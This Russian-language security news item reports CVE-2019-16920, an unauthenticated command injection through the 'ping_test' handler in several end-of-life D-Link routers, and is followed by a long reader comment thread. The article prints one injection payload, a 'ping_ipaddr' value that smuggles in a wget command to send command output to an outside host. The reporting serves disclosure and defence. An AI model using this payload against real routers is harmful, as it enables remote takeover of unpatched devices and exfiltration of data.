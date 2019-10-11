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Удалённо эксплуатируемая уязвимость в маршрутизаторах D-Link

11.10.2019 10:40

В беспроводных маршрутизаторах D-Link выявлена опасная уязвимость (CVE-2019–16920), позволяющая удалённо выполнить код на стороне устройства через отправку специального запроса к обработчику "ping_test", доступному без прохождения аутентификации.

Интересно, что по задумке разработчиков прошивки вызов "ping_test" должен выполняться только после аутентификации, но на деле он вызывается в любом случае, независимо от входа в web-интерфейс. В частности, при обращении к скрипту apply_sec.cgi с передачей параметра "action=ping_test", скрипт перебрасывает на страницу аутентификации, но при этом выполняет связанное с ping_test действие. Для выполнения кода использована ещё одна уязвимость в самом ping_test, который вызывает утилиту ping без должной проверки корректности переданного для тестирования IP-адреса. Например, для вызова утилиты wget и передачи на внешний хост результатов выполнения команды "echo 1234" достаточно указать параметр "ping_ipaddr=127.0.0.1%0awget%20-P%20/tmp/%20http://test.test/?$(echo 1234)".

Наличие уязвимости официально подтверждено в моделях:

  • DIR-655 с прошивкой 3.02b05 или старее;
  • DIR-866L с прошивкой 1.03b04 или старее;
  • DIR-1565 с прошивкой 1.01 или старее;
  • DIR-652 (данных о версиях проблемных прошивок не приводится)

Время сопровождения данных моделей уже истекло, поэтому компания D-Link заявила, что не будет выпускать для них обновления с устранением уязвимости, не рекомендует использовать и советует заменить на новые устройства. В качестве обходного пути защиты можно ограничить доступ к web-интерфейсу только для заслуживающих доверия IP-адресов.

Позднее выяснилось, что уязвимость также затрагивает модели DIR-855L, DAP-1533, DIR-862L, DIR-615, DIR-835 и DIR-825, о планах по выпуску обновлений для которых пока ничего не известно.

  1. Главная ссылка к новости (https://www.fortinet.com/blog/...)
  2. OpenNews: Уязвимости в Cisco RV32x были "устранены" через блокировку запросов от утилиты curl
  3. OpenNews: 83% изученных беспроводных маршрутизаторов содержат неисправленные уязвимости
  4. OpenNews: Уязвимости в маршрутизаторах GPON, которые уже используются для создания ботнета
  5. OpenNews: Новые уязвимости в маршрутизаторах MikroTik и TP-Link
  6. OpenNews: Удалённо эксплуатируемые уязвимости в маршрутизаторах TP-Link TL-R600VPN
Лицензия: CC-BY
Тип: Проблемы безопасности
Ключевые слова: d-link
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  • 1.1, Аноним (1), 10:48, 11/10/2019 [ответить] [﹢﹢﹢] [ · · · ]  
    		• +6 +/
    Ни в жисть не было и вот опять.
     
     
  • 2.27, Аноним (27), 12:11, 11/10/2019 [^] [^^] [^^^] [ответить]  
    		• +1 +/
    Но это барахло конкретно на дир 655 даже стороннюю прошивку не накатить из-за чип Ubicom.
     

  • 1.2, Аноним (2), 10:50, 11/10/2019 [ответить] [﹢﹢﹢] [ · · · ]  
    		• +/
    да что ж такое-то?
    эти д-линки стоят у половины народа кто ранее пары лет назад инет подключали...
     
     
  • 2.4, Аноним (4), 10:55, 11/10/2019 [^] [^^] [^^^] [ответить]  
    		• –5 +/
    Они сами виноваты.
     
     
  • 3.15, Аноним (15), 11:49, 11/10/2019 [^] [^^] [^^^] [ответить]  
    		• +/
    > Они сами виноваты.

    Ламер считает, что если что-то сломалось, то в этом виноват кто-то другой, но не он,

     
     
  • 4.17, Аноним (17), 11:54, 11/10/2019 [^] [^^] [^^^] [ответить]  
    		• +1 +/
    А что тут сломалось? Всё работает.
     
     
  • 5.22, Аноним (15), 12:02, 11/10/2019 [^] [^^] [^^^] [ответить]  
    		• +/
    Ламером называют человека, который не просто не шарит в чём-то, но и ещё пытается это скрыть, пытается всеми способами указать на свою правоту.
     
     
  • 6.30, Аноним (17), 12:24, 11/10/2019 [^] [^^] [^^^] [ответить]  
    		• +/
    Не понимаю, к чему этот комментарий. У производителя всегда доступен список поддерживаемых моделей и всех дат. Если человек покупает устаревшую модель - это его проблема.
     
     
  • 7.31, Аноним (31), 12:34, 11/10/2019 [^] [^^] [^^^] [ответить]  
    		• +5 +/
    >Если человек покупает устаревшую модель - это его проблема.

    правильно! Ведь если покупать актуальную модель, то она никогда не устареет!
    А вообще надо покупать новый прибор сразу после устаревания предыдущего, ведь он сразу перестает выполянть свои функции.

     
     
  • 8.32, Аноним (17), 12:40, 11/10/2019 [^] [^^] [^^^] [ответить]  
    		• –3 +/
    Ещё один Ты говоришь про совершенно другую проблему Устаревшее оборудование ... текст свёрнут, показать
     
     
  • 9.38, Аноним (15), 13:10, 11/10/2019 [^] [^^] [^^^] [ответить]  
    		• +2 +/
    Ты понимаешь, что фуфелью оно было сразу при выпуске ... текст свёрнут, показать
     
     
  • 10.40, Аноним (17), 13:14, 11/10/2019 [^] [^^] [^^^] [ответить]  
    		• +/
    Какая разница Как это влияет на обусловленные сроки поддержки ... текст свёрнут, показать
     
     
  • 11.72, Аноним (15), 15:53, 11/10/2019 [^] [^^] [^^^] [ответить]  
    		• +/
    Срок поддержки не имеет отношения к теме Тема про то, что кто-то под видом каче... текст свёрнут, показать
     
     
  • 12.76, Аноним (17), 16:26, 11/10/2019 [^] [^^] [^^^] [ответить]  
    		• +/
    Нет, тема как раз про срок поддержки, а не про то, кто там что продаёт ... текст свёрнут, показать
     
     
  • 13.81, Аноним (15), 16:32, 11/10/2019 [^] [^^] [^^^] [ответить]  
    		• +/
    Специально для тех, у кого проблемы с глазами, скопирую название темы Удалённо... текст свёрнут, показать
     
     
  • 14.84, Аноним (17), 16:39, 11/10/2019 [^] [^^] [^^^] [ответить]  
    		• +/
    Я на комментарий отвечал, а не на тему в новости ... текст свёрнут, показать
     
     
  • 15.87, Аноним (15), 16:44, 11/10/2019 [^] [^^] [^^^] [ответить]  
    		• +/
    И в ответе ты написал тема как раз про срок поддержки , что не соответствует д... текст свёрнут, показать
     
     
  • 16.89, Аноним (17), 16:54, 11/10/2019 [^] [^^] [^^^] [ответить]  
    		• +/
    Ты совсем глупый, да Тема разговора в комментариях, а не тема новости ... текст свёрнут, показать
     
  • 12.80, Аноним (17), 16:31, 11/10/2019 [^] [^^] [^^^] [ответить]  
    		• +/
    Или ты думаешь, что нормальные производители продают идеальные роутеры без уяз... текст свёрнут, показать
     
     
  • 13.82, Аноним (15), 16:33, 11/10/2019 [^] [^^] [^^^] [ответить]  
    		• +/
    Думаю, ты занимаешься демагогией Зачем оно тебе надо ... текст свёрнут, показать
     
     
  • 14.85, Аноним (17), 16:40, 11/10/2019 [^] [^^] [^^^] [ответить]  
    		• +/
    Чтобы победить таких гоблинов, как ты ... текст свёрнут, показать
     
     
  • 15.88, Аноним (15), 16:44, 11/10/2019 [^] [^^] [^^^] [ответить]  
    		• +/
    Ламером называют человека, который не просто не шарит в чём-то, но и ещё пытаетс... текст свёрнут, показать
     
  • 10.42, Аноним (27), 13:15, 11/10/2019 [^] [^^] [^^^] [ответить]  
    		• +/
    А ты не думаешь что они когда выпускали сразу знали что собираются выпустить фуф... текст свёрнут, показать
     
     
  • 11.73, Аноним (15), 16:00, 11/10/2019 [^] [^^] [^^^] [ответить]  
    		• +/
    Такая вероятность есть Можешь заняться её оценкой, если тебе интересны теории з... текст свёрнут, показать
     
  • 9.49, Аноним (31), 13:57, 11/10/2019 [^] [^^] [^^^] [ответить]  
    		• +1 +/
    это новый алгоритм запланированного устаревания Мы нашли дыру, но фиксить прошл... текст свёрнут, показать
     
     
  • 10.50, Аноним (17), 14:10, 11/10/2019 [^] [^^] [^^^] [ответить]  
    		• +/
    Нет, это довольно старая тактика ... текст свёрнут, показать
     
  • 10.63, Аноним84701 (ok), 15:01, 11/10/2019 [^] [^^] [^^^] [ответить]  
    		• +/
    Вообще-то, чтобы узнать о том, что стоимость поддержки всегда входит в конечную ... текст свёрнут, показать
     
     
  • 11.92, Аноним (31), 16:59, 11/10/2019 [^] [^^] [^^^] [ответить]  
    		• +/
    угу, а еще у некоторых можно вычитать, что обновление прошивки снимает гарантию ... текст свёрнут, показать
     
  • 9.62, Михрютка (ok), 14:59, 11/10/2019 [^] [^^] [^^^] [ответить]  
    		• +2 +/
    устаревшее оборудование заменяют, потому что бюджет на замену выбили а до тех ... текст свёрнут, показать
     
     
  • 10.65, Аноним (17), 15:09, 11/10/2019 [^] [^^] [^^^] [ответить]  
    		• –1 +/
    У вас на 1С не бывает уязвимостей, поэтому для тебя это за гранью фантастики ... текст свёрнут, показать
     
  • 9.77, Аноним (77), 16:27, 11/10/2019 [^] [^^] [^^^] [ответить]  
    		• +1 +/
    Кто тебе сказал такую глупость ... текст свёрнут, показать
     
     
  • 10.86, Аноним (17), 16:42, 11/10/2019 [^] [^^] [^^^] [ответить]  
    		• +/
    Перефразирую Устаревшее сетевое оборудование заменяют нормальные люди, которые ... текст свёрнут, показать
     
     
  • 11.90, Аноним (31), 16:58, 11/10/2019 [^] [^^] [^^^] [ответить]  
    		• +/
    люди, далекие от IT еще входят в категорию нормальных ... текст свёрнут, показать
     
  • 3.46, aim (ok), 13:45, 11/10/2019 [^] [^^] [^^^] [ответить]  
    		• +/
    не всегда они "виноваты" ибо есть операторское оборудование принудительно поставленное.
     
     
  • 4.68, Аноним (17), 15:32, 11/10/2019 [^] [^^] [^^^] [ответить]  
    		• +/
    Не знаю ни одного оператора, который бы насильно ставил роутеры в дома при подключении услуг. Все, которые я видел, предлагали оборудование опционально.
     
     
  • 5.69, aim (ok), 15:33, 11/10/2019 [^] [^^] [^^^] [ответить]  
    		• +/
    > Не знаю ни одного оператора, который бы насильно ставил роутеры в дома
    > при подключении услуг. Все, которые я видел, предлагали оборудование опционально.

    ростелеком как самый распространённый пример. и таких - сотни по всей стране.

     
     
  • 6.83, Аноним (77), 16:36, 11/10/2019 [^] [^^] [^^^] [ответить]  
    		• +/
    На не знаю, у меня свой. У вас какой-то Ростелеком нездорового человека. Имеете право пожаловаться на него в ФАС.
     
  • 5.79, chorny (ok), 16:28, 11/10/2019 [^] [^^] [^^^] [ответить]  
    		• +/
    Orange в Кишинёве ставит кабельные модемы с рутером. Там даже нельзя поменять пароль на Wi-Fi.
     
  • 2.5, Аноним (5), 10:57, 11/10/2019 [^] [^^] [^^^] [ответить]  
    		• +/
    > д-линки стоят у половины народа кто ранее пары лет назад инет подключали...

    Не смогут удалённо заэксплуатировать, потому что роутер только в локальной сети висит. Это не про домашние роутеры речь, скорее всего. Да и у меня ни один из тех методов, из локалки, что описаны, не работают. ЧЯДНТ?

     
     
  • 3.13, X4asd (ok), 11:38, 11/10/2019 [^] [^^] [^^^] [ответить]  
    		• +1 +/
    > Не смогут удалённо заэксплуатировать, потому что роутер только в локальной сети висит

    csrf ?

    (даже dnsrebinding не понадобится)

     
  • 3.58, Михрютка (ok), 14:54, 11/10/2019 [^] [^^] [^^^] [ответить]  
    		• +/
    мил человек, ты на их модели смотрел?

    DIR это именно что серия домашних маршрутизаторов. броадком какой-нибудь с двумя езернетами, свитч на шесть портов и wifi модуль.

     
  • 2.66, анонимчик (?), 15:12, 11/10/2019 [^] [^^] [^^^] [ответить]  
    		• +/
    а какие сейчас заруливают?
     
  • 2.74, Аноним (74), 16:01, 11/10/2019 [^] [^^] [^^^] [ответить]  
    		• +/
    У меня TP-LINK и D-LINK роутеры с вайфаем ломало каждые 3-и дня. Зависнет и все. Нету интернета. Ничего не помогало.

    Пока я не поставил в качестве шлюза старый комп Linux+Iptables. И зависать перестали роутеры. С тех пор так и делаю.
    Сейчас думаю покупать устройство с поддержко OpenWRT.

     
     
  • 3.78, анонимчик (?), 16:27, 11/10/2019 [^] [^^] [^^^] [ответить]  
    		• –1 +/
    У меня главная проблема - недобивание до кухни. Тоже думаю обновиться на чтото китайское с openwrt и усилитель или соплю прокинуть
     
  • 3.91, БСПФА (?), 16:58, 11/10/2019 [^] [^^] [^^^] [ответить]  
    		• +/
    Всегда когда читаю такое ("у меня всегда что-то ломалось с чем-то") начинаю сильно комплексовать, вроде имеют тоже самое оборудование или софт, а у меня такого нет, наверное просто не хватает квалификации?!
    Пользовался и сейчас пользуюсь дешманским оборудованием длинк (в силу хронической нищеты), что коммутаторы (левел 2-3, с кучей вланов и ацл), что маршрутизаторы работают и работают исправно, наверное я точно тупой!
     

  • 1.3, grsec (ok), 10:55, 11/10/2019 [ответить] [﹢﹢﹢] [ · · · ]  
    		• +1 +/
    > Наличие уязвимости официально подтверждено в моделях:

    Наличие уязвимости официально поддерживаемы в моделях:

     
     
  • 2.28, Аноним (27), 12:12, 11/10/2019 [^] [^^] [^^^] [ответить]  
    		• +1 +/
    Ну да это с самого начала были фичи, а журналюги раздули что это уязвимости.
     

  • 1.6, Аноним (6), 10:57, 11/10/2019 [ответить] [﹢﹢﹢] [ · · · ]  
    		• +9 +/
    > Время сопровождения данных моделей уже истекло, поэтому компания D-Link заявила, что не будет выпускать для них обновления с устранением уязвимости

    Мы нафакапили, но вы слишком поздно заметили - так что идите подальше. Хороший подход, да.

     
     
  • 2.7, DLink sales manager (?), 11:03, 11/10/2019 [^] [^^] [^^^] [ответить]  
    		• +4 +/
    Что Вы, ни в коем случае! У нас есть прекрасные новые модели, не подверженные этой уязвимости. Ждём Вас в магазине!
     
     
  • 3.11, Аноним (11), 11:31, 11/10/2019 [^] [^^] [^^^] [ответить]  
    		• +2 +/
    > У нас есть прекрасные новые модели, не подверженные этой уязвимости. Ждём Вас в магазине!

    За свеженькими уязвимостями. :)

     
  • 2.45, Корец (?), 13:41, 11/10/2019 [^] [^^] [^^^] [ответить]  
    		• +2 +/
    Поэтому это веский аргумент использовать свободные прошивки.
     

  • 1.8, Аноним (8), 11:08, 11/10/2019 [ответить] [﹢﹢﹢] [ · · · ]  
    		• +1 +/
    >Время сопровождения данных моделей уже истекло

    Давно пора внести в закон чтобы оговаривалось в документах к устройству время сопровождения, как срок годности у продуктов.
    Это же угроза мирового интернета/страны и прочей лабуды!

     
     
  • 2.9, fske (?), 11:16, 11/10/2019 [^] [^^] [^^^] [ответить]  
    		• +1 +/
    Есть другая сторона вопроса - кто будет латать эту дыру? Домохозяйки не будут
     
  • 2.10, mumu (ok), 11:23, 11/10/2019 [^] [^^] [^^^] [ответить]  
    		• +1 +/
    Срок поддержки всегда явным образом прописан в документах.
     
     
  • 3.55, Михрютка (ok), 14:42, 11/10/2019 [^] [^^] [^^^] [ответить]  
    		• –1 +/
    чо? гарантийный срок поддержки там прописан, и то не у всех. у дешманских длинков наверняка не прописан.

    а дальше сами сами, уважаемые покупатели. вот вам ссылочка на страничку поддержки вашего продукта (которая через полгода нерабочая, потому что эджайл и всякие эйсиди^W сиай/сиди) и регулярно ее посещайте, мы там когда-нибудь напишем про эндофлайф вашего продукта. ну или не напишем.

    а то ишь моду взяли, купили железку и давай ей по пять лет пользоваться.

     
  • 2.21, Аноним (17), 12:01, 11/10/2019 [^] [^^] [^^^] [ответить]  
    		• +3 +/
    Если бы ты читал эти документы, то знал, что это всё там есть.
     
     
  • 3.35, Аноним (8), 13:02, 11/10/2019 [^] [^^] [^^^] [ответить]  
    		• –2 +/
    Тогда о чём эта новость? То что нашли дыру в не поддерживаемом оборудование которое уже как лет пять не должно было использоваться.
     
     
  • 4.37, Аноним (17), 13:06, 11/10/2019 [^] [^^] [^^^] [ответить]  
    		• +/
    Ну да, так и есть. Ты как будто тут недавно.
     
  • 2.24, Нанобот (ok), 12:05, 11/10/2019 [^] [^^] [^^^] [ответить]  
    		• +1 +/
    >угроза мирового интернета

    как страшно жить в этих ваших интернетах

     
  • 2.25, Аноним (27), 12:07, 11/10/2019 [^] [^^] [^^^] [ответить]  
    		• –1 +/
    Конечно ввести федеральную программу бессрочной поддержки электронных устройств. Выделит на неё два миллиарда рублей. Потом бюджет попилить, а потом сказать что не шмогла я. Плавали знаем.
     

  • 1.12, Аноним (12), 11:37, 11/10/2019 [ответить] [﹢﹢﹢] [ · · · ]  
    		• +/
    Дилиньк - лидер! (по количеству уязвимостей)
     
     
  • 2.14, X4asd (ok), 11:39, 11/10/2019 [^] [^^] [^^^] [ответить]  
    		• –1 +/
    > Дилиньк - лидер! (по количеству уязвимостей)

    ды просто лидер!

    лидер на букву п =)

     

  • 1.16, artenox (?), 11:53, 11/10/2019 [ответить] [﹢﹢﹢] [ · · · ]  
    		• –6 +/
    >рейтинги - худшее, что придумало человечество

    Кстати, одно время на рутрекере ввели рейтинги. Так появились юзерпики анимированные "человек бежит и с разбегу башит в голову со словами: он ставит минуса". Потом было голосование. Большинство выбрало отказ от рейтингов и их убрали. Я сам лично голосовал. А опеннет и хабр это сайты defective by design. А еще я теперь ржу, когда говорят, что на западе стучат. Русские стучат словно дятлы, аж мебель ходуном ходит. Кроме того еще и м*даки. Человека затравили за то, что он ничего плохого не сделал. Я теперь понимаю Столлмана и всю эту линукс среду. Впрочем, это везде так. Люди-волки.

     
     
  • 2.18, artenox (?), 11:55, 11/10/2019 [^] [^^] [^^^] [ответить]  
    		• –1 +/
    Я кстати ни разу не жаловался, даже не знаю как выглядит эта форма.
     
  • 2.20, A.N.Onimous (?), 11:59, 11/10/2019 [^] [^^] [^^^] [ответить]  
    		• +1 +/
    Эээ... а это к чему?
    Ты темой не ошибся? :)
     
     
  • 3.29, Аноним (15), 12:21, 11/10/2019 [^] [^^] [^^^] [ответить]  
    		• +/
    > Эээ... а это к чему?
    > Ты темой не ошибся? :)

    Это там не ошибка, а форма когнитивной слепоты. Когда бомбит сверх меры, адекватность восприятия нарушается.

     

  • 1.19, ryoken (ok), 11:59, 11/10/2019 [ответить] [﹢﹢﹢] [ · · · ]  
    		• +4 +/
    Говноделы опять наделали говна? Хмм... Кто бы удивлялся...
     
     
  • 2.56, Аноним (56), 14:45, 11/10/2019 [^] [^^] [^^^] [ответить]  
    		• –1 +/
    Ты-то, конечно, ошибок не совершал нигде и никогда, лол.
     

  • 1.23, Аноним (27), 12:04, 11/10/2019 [ответить] [﹢﹢﹢] [ · · · ]  
    		• +1 +/
    Дыр-линкеры и все покупатели подобного шлака должны страдать. То ли дело Микротик уязвимости хоть и попадаются, но фиксятся вполне оперативно. А уж по функционалу и не найти ничего лучше в этом сегменте.
     
     
  • 2.26, Нанобот (ok), 12:08, 11/10/2019 [^] [^^] [^^^] [ответить]  
    		• +2 +/
    может и должны, но не будут. страдать будут напричастные владельцы веб-сайтов, которым придётся отбиваться от ботнетов
     
  • 2.34, Аноним (17), 12:45, 11/10/2019 [^] [^^] [^^^] [ответить]  
    		• +/
    Ах да, православный Микротик, к проприетарной прошивке которого нужно покупать ключ, если ставить на не родные девайсы. Нет, спасибо. Мне на OpenWrt хорошо.
     
     
  • 3.36, Аноним (27), 13:05, 11/10/2019 [^] [^^] [^^^] [ответить]  
    		• +/
    Что то твой опенврт не ставится на дир 655.
     
     
  • 4.39, Аноним (17), 13:11, 11/10/2019 [^] [^^] [^^^] [ответить]  
    		• +1 +/
    Ну, он много куда не ставится. Но при покупке нового роутера я специально посмотрю, куда он ставится, вместо того, чтобы покупать Микротик. А может и pfSense/OPNsense соберу.
     
  • 4.70, ryoken (ok), 15:36, 11/10/2019 [^] [^^] [^^^] [ответить]  
    		• +/
    > Что то твой опенврт не ставится на дир 655.

    ну и не надо на говно ставить нормальную ОС

     
  • 2.43, супернуб (?), 13:29, 11/10/2019 [^] [^^] [^^^] [ответить]  
    		• +/
    "Ну не знаааю.. "(с)
    Был у меня "для дома для семьи" микротык (hAP ac lite) - показался избыточен (так и валяется без дела - благо "за так"достался). Да и гига в нём нет. То ли дело N600 v2 (асусевский на "падаване") - само "то" для таких нубов как я (и гиг есть, и боль-мень понятно в настройках, и стоит не намного дороже сопоставимо).

    ИМХО - кому гиг в сетке не нужен и хватает одной дырки для шнурка, вообще можно китайский "тот самый NEXX" (wt3020) за 15 баксов взять, залить того же падавана или OpenWRT и развлекаться до посинения и крacнoглазия (там же все 133 удовольствия получаешь за гроши)

     
     
  • 3.51, Аноним (12), 14:13, 11/10/2019 [^] [^^] [^^^] [ответить]  
    		• +/
    Дома интересно наличие 5 GHz.
     
     
  • 4.67, супернуб (?), 15:22, 11/10/2019 [^] [^^] [^^^] [ответить]  
    		• +/
    упомянутый микротык даёт это из коробки, N56U - после перепрошивки (только шуба заворачивается).
    Nexx - там вполне себе до 300 мбит на любой прошивке, включая стоковую. Нормальный такой конкурент тем же среднедешёвым D/TP линкам (опять же USB порт есть - хоть модем вставляй, хоть диск. Всё работает).
    Правда их уже особо не найти (размели-с) - сейчас друге у китайцев появились: тоже самое, только памяти внутри "от 64" (но и подороже раза в 2) и уже сразу идёт или с OpenWRT или с "пдаваном" (на выбор). Хотя кто его знает, этих китайцев - что они в эту прошивку внедрили..

    ИМХО - 5GHz имеет смысл если всё остальное их нормально держит, включая "боольшой зомбоящик".
    А так и шнурок на гиг всяко лучше будет и "300" вполне хватает (для ноута).

     

  • 1.33, InuYasha (?), 12:45, 11/10/2019 [ответить] [﹢﹢﹢] [ · · · ]  
    		• +/
    Прошивки мы обновлять не будем, вы там держитесь.
    Хорошего вам интернета.
     
  • 1.41, Аноним (41), 13:15, 11/10/2019 [ответить] [﹢﹢﹢] [ · · · ]  
    		• +/
    Че, нормально пинг проверели, пачаны.
     
  • 1.44, Аноним (44), 13:35, 11/10/2019 [ответить] [﹢﹢﹢] [ · · · ]  
    		• +/
    Раз компания откказывается поддерживать устройства, то должна выложить исходный код прошивок, для исправления ошибок силами пользователей. Это вполне законное "право на починку"
     
     
  • 2.47, Аноним (17), 13:45, 11/10/2019 [^] [^^] [^^^] [ответить]  
    		• –1 +/
    Они вам ничего не должны :)
     
     
  • 3.52, Аноним (12), 14:15, 11/10/2019 [^] [^^] [^^^] [ответить]  
    		• +/
    Должны. Юзеры им деньги заплатили.
     
     
  • 4.54, Аноним (17), 14:37, 11/10/2019 [^] [^^] [^^^] [ответить]  
    		• +/
    Юзеры деньги заплатили за то, что им предложили. Не надо строить никаких моралей из обычной транзакции.
     
  • 4.64, Аноним (64), 15:06, 11/10/2019 [^] [^^] [^^^] [ответить]  
    		• +/
    > Юзеры им деньги заплатили.

    Вот эти вот жалкие копейки, которых сие барахло стоит? За такие деньги — точно ничего не должны.

     
     
  • 5.75, Аноним (12), 16:07, 11/10/2019 [^] [^^] [^^^] [ответить]  
    		• +/
    Не верю, что произвводители железок себе в убыток продают. Не Верю! (C)
     
  • 3.59, Аноним (44), 14:54, 11/10/2019 [^] [^^] [^^^] [ответить]  
    		• +1 +/
    Производитель не является рабовладельцем, они не могут мне препядствовать почитать  вещь купленную мной, если они отнимают у меня это право (через железо, схемы, исходный код, юридические заковырки, скрои поддержки) то они вынуждают меня купить новую ведь, а это уже не бизнес а мошеничество, то есть они должны отдавать исходный код и более того схемы! Либо они из производителя превращаются в террористов, тогда пользователь начинает делать бомбы и взрывать бандитов.
     
     
  • 4.60, Аноним (44), 14:55, 11/10/2019 [^] [^^] [^^^] [ответить]  
    		• +/
    *** починить
     
  • 2.48, Аноним (17), 13:48, 11/10/2019 [^] [^^] [^^^] [ответить]  
    		• –1 +/
    Если люди хотят, они пишут свои прошивки. Проблема упирается в драйверы, лицензия которых не под котролем производителя девайса, а под контролем производителей самих чипов. Некоторые открывают, некоторые нет.
     
     
  • 3.53, Аноним (12), 14:20, 11/10/2019 [^] [^^] [^^^] [ответить]  
    		• +1 +/
    Что мешает производителям девайсов выбирать производителей чипов, которые открывают? Производителям девайсов меньше головняка, если есть открытые драйверы.

    PS А так бы, да. Превед, Бредком, до свиданья!

     
     
  • 4.57, Аноним (17), 14:50, 11/10/2019 [^] [^^] [^^^] [ответить]  
    		• +1 +/
    Производителям девайсов нет дела до открытости чипов, им нужно как можно больше заработать денег. Оттого и сроки поддержки такие короткие. Сомневаюсь, что просто купить лицензию им вообще накладно как-то. К тому же, high end открытых чипов ни у кого нет.
     

  • 1.61, Аноним (61), 14:57, 11/10/2019 [ответить] [﹢﹢﹢] [ · · · ]  
    		• +/
    > Время сопровождения данных моделей уже истекло, поэтому компания D-Link заявила, что:
    > не будет выпускать для них обновления с устранением уязвимости
    > , не рекомендует использовать
    > и советует заменить на новые устройства.
    > В качестве обходного пути защиты можно ограничить доступ к web-интерфейсу только для заслуживающих доверия IP-адресов.

    Ну разумеется, на сайте про свободное программное обеспечение - ни слова про свободные альтернативы в самой новости. Только в комментариях. Позорище.

     
  • 1.71, Нуб (?), 15:39, 11/10/2019 [ответить] [﹢﹢﹢] [ · · · ]  
    		• +/
    адсл модем от д-линка работает в режиме бриджа - для меня эта проблема актуальна?

    Вообще - существуют ли модемы с рабочим адсл-модулем, на которые можно поставить опенврт?

     
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